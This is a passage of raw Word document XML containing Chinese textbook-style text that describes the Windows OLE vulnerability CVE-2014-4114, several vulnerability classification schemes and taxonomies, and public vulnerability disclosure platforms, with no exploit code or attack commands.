        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4114</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞为例分析安全漏洞，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2014</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4114</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Microsoft Windows OLE中存在一个漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果用户打开包含特制的OLE对象的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则该漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可能允许远程执行代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。成功利用此漏洞的攻击者可以获得与</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录用户相同的用户权限。如果当前用户使用管理用户权限登录，则攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9FCC7C"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该漏洞影响的操作系统版本有：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows Vista SP2，Windows Server 2008 SP2，Windows 7 SP1，Windows Server 2008 R2 SP1，Windows 8，Windows 8.1，Windows Server 2012，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Server 2012 R2，Windows RT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows RT 8.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F749468" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066E07B7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462AB838"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2.1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞分类及其标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEA13C8"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由于计算机程序的复杂性，从操作系统到应用程序，漏洞的种类多种多样，需要建立一定的标准规范漏洞的分类，一般可按照漏洞威胁、漏洞成因、漏洞严重性、漏洞被利用方式等标准对漏洞进行分类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205DEE3"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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>按照漏洞威胁分类，漏洞可分为以下类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36446E6D"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①获取访问权限漏洞，包含远程管理员权限、本地管理员权限、普通用户访问权限等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D1BC5"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②权限提升漏洞，如沙箱，读取受限文件等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F530B"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③拒绝服务漏洞，包含本地拒绝服务，远程拒绝服务；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191BE36"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④恶意软件植入漏洞；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B0924"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⑤数据丢失或泄露漏洞，如远程非授权文件存取、口令回复、欺骗、服务器信息泄露等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA76A9"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>按照漏洞成因分类，漏洞可分为以下类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0606D6F0"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①输入验证错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7068BD"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②访问验证错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EF34D"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③竞争条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978A63F"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④意外情况处置错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748E671F"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⑤设计错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1616FEDC"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⑥配置错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BF54C"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⑦环境错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E2101"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>按照漏洞严重性分类，漏洞可分为以下类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6884E646"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A 类漏洞（高）：威胁性最大的漏洞，往往由较差的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统管理或错误设置造成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82ED23"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B 类漏洞（中）：较为严重的漏洞，例如允许本地用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>户获得增加的和未授权的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D02C29"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C 类漏洞（低）：严重性不是很大的漏洞，例如允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝服务的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773AEF91"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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>按照漏洞被利用方式分类，，漏洞可分为以下类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05833D"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①</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Linux Kernel 2.6 udev Netlink消息验证本地权限提升漏洞（CVE-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8894DA"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2009-1185</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC332EE"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②</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>远程主动攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85B618"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lastRenderedPageBreak/>
        <w:t>洞（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MS03-026）（CVE-2003-0352</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A78433"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③</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>远程被动攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338744F6" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676D6031"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普渡大学的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Aslam</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Krsul</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提出了一种</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞分类法</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码缺陷、环境故障和操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误、社会和人为因素等，其中社会工程包含偷盗、破坏、信息获取、欺骗等；安全策略包含物理安全策略、人员安全策略、数据安全策略等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1014EF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AFDC21E" wp14:editId="340CD7C2">
            <wp:extent cx="5274310" cy="3883660"/>
            <wp:effectExtent l="0" t="0" r="5715"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83660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06000C90" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞分类示意图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B0B5D3" w14:textId="3B31899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Bishop的六轴分类法</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包含漏洞成因、出现时间、利用方式、作用域、漏洞利用的组件数、代码缺陷。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Knight的四类型分类</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将人的行为对信息系统安全的影响</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>引入到漏洞分类中</w:t>
      </w:r>
      <w:r w:rsidR="000F33AB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177F080F" w14:textId="1F017545"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常见的漏洞暴露平台有</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE（http://cve.mitre.org/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）、微软安全公告（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MSXX－XXX）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、国家信息安全漏洞共享平台（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Chinese National Vulnerability Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00CA5248">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.cnvd.org.cn/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、国家信息安全漏洞共享平台（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Chinese National Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00E448C6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00CA5248">
          <w:rPr>
            <w:rStyle w:val="ab"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.cnvd.org.cn/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CNNVD（国家信息安全测评中心）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>360补天</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、各大</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SRC等</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64F48C" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.3 软件漏洞利用对系统的威胁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F069B8A"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漏洞影响的对象主要有操作系统、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>路由器</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>防火墙</w:t>
      </w:r>
